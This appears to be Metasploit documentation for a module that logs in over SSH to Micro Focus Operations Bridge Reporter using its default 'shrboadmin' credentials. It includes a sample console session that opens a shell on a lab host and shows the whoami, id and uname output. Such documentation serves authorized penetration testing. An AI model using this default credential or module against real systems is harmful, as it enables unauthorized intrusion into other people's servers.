CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Vulnerable Application

This module abuses a known default password on Micro Focus Operations Bridge Reporter. The 'shrboadmin' user, installed by default by the product has the password of 'shrboadmin', and allows an attacker to login to the server via SSH. This module has been tested with Micro Focus Operations Bridge Manager 10.40. Earlier versions are most likely affected too, but have not been tested with this module. Note that this is only exploitable in Linux installations.

Verification Steps

1. Setup RHOST and run it!

Scenarios

Micro Focus Operations Bridge Manager 10.40

msf6 > use exploit/linux/ssh/microfocus_obr_shrboadmin
msf6 exploit(linux/ssh/microfocus_obr_shrboadmin) > set rhosts 10.0.0.100
rhosts => 10.0.0.100
msf6 exploit(linux/ssh/microfocus_obr_shrboadmin) > run

[*] 10.0.0.100:22 - Attempt to login to the server...
[+] 10.0.0.100:22 - Login Successful (shrboadmin:shrboadmin)
[*] Found shell.
[*] Command shell session 1 opened (10.0.0.1:35023 -> 10.0.0.100:22) at 2021-04-23 14:44:09 +0700

whoami
shrboadmin
id
uid=1001(shrboadmin) gid=1001(shrboadmin) groups=1001(shrboadmin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos7 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux